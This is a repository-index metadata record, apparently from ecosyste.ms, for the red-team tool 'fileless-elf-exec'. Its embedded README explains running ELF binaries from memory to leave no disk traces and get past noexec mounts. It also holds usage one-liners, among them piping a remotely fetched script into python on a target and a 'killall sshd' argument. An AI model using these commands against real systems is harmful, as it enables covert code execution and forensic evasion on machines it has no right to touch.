{"id":13564057,"url":"https://github.com/nnsee/fileless-elf-exec","last_synced_at":"2026-01-12T14:34:22.497Z","repository":{"id":50752197,"uuid":"232094832","full_name":"nnsee/fileless-elf-exec","owner":"nnsee","description":"Execute ELF files without dropping them on disk","archived":false,"fork":false,"pushed_at":"2024-06-28T15:23:21.000Z","size":108,"stargazers_count":497,"open_issues_count":0,"forks_count":49,"subscribers_count":9,"default_branch":"master","last_synced_at":"2025-09-25T01:44:15.616Z","etag":null,"topics":["elf","linux","python","redteam","security","security-tools"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nnsee.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-01-06T12:19:34.000Z","updated_at":"2025-09-17T20:15:31.000Z","dependencies_parsed_at":"2024-08-01T13:19:59.567Z","dependency_job_id":"64e3a5ef-6828-4d35-b6bd-43f2a8437df4","html_url":"https://github.com/nnsee/fileless-elf-exec","commit_stats":{"total_commits":31,"total_committers":4,"mean_commits":7.75,"dds":0.4838709677419355,"last_synced_commit":"1e3b9f590f0fbf52f050132050fc32623bbf4cf8"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/nnsee/fileless-elf-exec","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nnsee%2Ffileless-elf-exec","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nnsee%2Ffileless-elf-exec/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nnsee%2Ffileless-elf-exec/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nnsee%2Ffileless-elf-exec/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nnsee","download_url":"https://codeload.github.com/nnsee/fileless-elf-exec/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nnsee%2Ffileless-elf-exec/sbom","scorecard":{"id":691177,"data":{"date":"2025-08-11","repo":{"name":"github.com/nnsee/fileless-elf-exec","commit":"c0796401afb350fb638ba31636369ff335098cc0"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":3,"checks":[{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":-1,"reason":"No tokens found","details":null,"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":-1,"reason":"no workflows found","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":-1,"reason":"no dependencies found","details":null,"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: GNU General Public License v3.0: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'master'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}}]},"last_synced_at":"2025-08-22T02:20:07.122Z","repository_id":50752197,"created_at":"2025-08-22T02:20:07.122Z","updated_at":"2025-08-22T02:20:07.122Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28340400,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-12T12:22:26.515Z","status":"ssl_error","status_checked_at":"2026-01-12T12:22:10.856Z","response_time":98,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.6:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["elf","linux","python","redteam","security","security-tools"],"created_at":"2024-08-01T13:01:26.081Z","updated_at":"2026-01-12T14:34:22.476Z","avatar_url":"https://github.com/nnsee.png","language":"Python","readme":"## Execute ELF files on a machine without dropping an ELF\n\n[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black)\n\n### Description\n\nThis Python script generates interpreted code which creates the supplied ELF as a file in memory and executes it (without tmpfs). This makes it possible to execute binaries without leaving traces on the disk.\n\nThe technique used for this is explained [here](https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html).\n\nWith default options for each interpreter, running binaries using `fee` does not write to disk whatsoever. This can be verified using tools such as `strace`.\n\n`fee` also completely ignores and bypasses `noexec` mount flags, even if they were set on `/proc`.\n\n\n### Target requirements\n\n * kernel: 3.17 or later (for `memfd_create` support)\n * An interpreter. Any of these:\n   * Python 2\n   * Python 3\n   * Perl\n   * Ruby\n\n\n### Installation\n\nInstall this on your host machine using [pipx](https://github.com/pypa/pipx):\n```console\n$ pipx install fee\n```\n\n... or regular pip:\n```console\n$ pip install --user fee\n```\n\nYou may also clone this repository and run the script directly.\n\n### Usage\n\nBasic usage: supply the path to the binary you wish to drop:\n\n```console\n$ fee /path/to/binary \u003e output.py\n```\n\nYou can then pipe this into Python on the target:\n\n```console\n$ curl my.example.site/output.py | python\n```\n\nAlternatively, you may generate Perl or Ruby code instead with the `--lang` flag (`-l`):\n```console\n$ fee /path/to/binary -l pl | perl\n```\n\n```console\n$ fee /path/to/binary -l rb | ruby\n```\n\nIf you want to pipe over ssh, use the `--with-command` flag (`-c`) to wrap the output in `python -c` (or `perl -e`, `ruby -e` accordingly):\n\n```console\n$ fee -c /path/to/binary | ssh user@target\n```\n\nWhen piping over ssh, you sometimes want to wrap the long line which holds the base64-encoded version of the binary, as some shells do not like super long input strings. You can accomplish this with the `--wrap` flag (`-w`):\n```console\n$ fee -c /path/to/binary -w 64 | ssh user@target\n```\n\nIf you want to customise the arguments, use the `--argv` flag (`-a`):\n\n```console\n$ fee -a \"killall sshd\" ./busybox \u003e output.py\n```\n\n**If you don't wish to include the binary in the generated output**, you can instruct `fee` to generate a script which accepts the ELF from stdin at runtime. For this, use `-` for the filename. You can combine all of these options for clever one-liners:\n```console\n$ ssh user@target \"$(fee -c -a \"echo hi from stdin\" -t \"libc\" -)\" \u003c ./busybox\n\nhi from stdin\n```\n\n__NB!__ By default, the script parses the encoded ELF's header to determine the target architecture. This is required to use the correct syscall number when calling `memfd_create`. If this fails, you can use the `--target-architecture` (`-t`) flag to explicitly generate a syscall number. Alternatively, you can use the `libc` target to resolve the symbol automatically at runtime, although this only works when generating Python code.\nFor more exotic platforms, you should specify the syscall number manually. You need to search for `memfd_create` in your target's architecture's syscall table. This is located in various places in the Linux kernel sources. Just Googling `[architecture] syscall table` is perhaps the easiest. You can then specify the syscall number using the `--syscall` flag (`-s`).\n\nFull help text:\n```\nusage: fee.py [-h] [-t ARCH | -s NUM] [-a ARGV] [-l LANG] [-c] [-p PATH] [-w CHARS] [-z LEVEL]\n              path\n\nPrint code to stdout to execute an ELF without dropping files.\n\npositional arguments:\n  path                  path to the ELF file (use '-' to read from stdin at runtime)\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -t ARCH, --target-architecture ARCH\n                        target platform for resolving memfd_create (default: detect from ELF)\n  -s NUM, --syscall NUM\n                        syscall number for memfd_create for the target platform\n  -a ARGV, --argv ARGV  space-separated arguments (including argv[0]) supplied to execle (default:\n                        path to file as argv[0])\n  -l LANG, --language LANG\n                        language for the generated code (default: python)\n  -c, --with-command    wrap the generated code in a call to an interpreter, for piping directly\n                        into ssh\n  -p PATH, --interpreter-path PATH\n                        path to interpreter on target if '-c' is used, otherwise a sane default is\n                        used\n  -w CHARS, --wrap CHARS\n                        when base64-encoding the elf, how many characters to wrap to a newline\n                        (default: 0)\n  -z LEVEL, --compression-level LEVEL\n                        zlib compression level, 0-9 (default: 9)\n```\n","funding_links":[],"categories":["Python"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnnsee%2Ffileless-elf-exec","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fnnsee%2Ffileless-elf-exec","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnnsee%2Ffileless-elf-exec/lists"}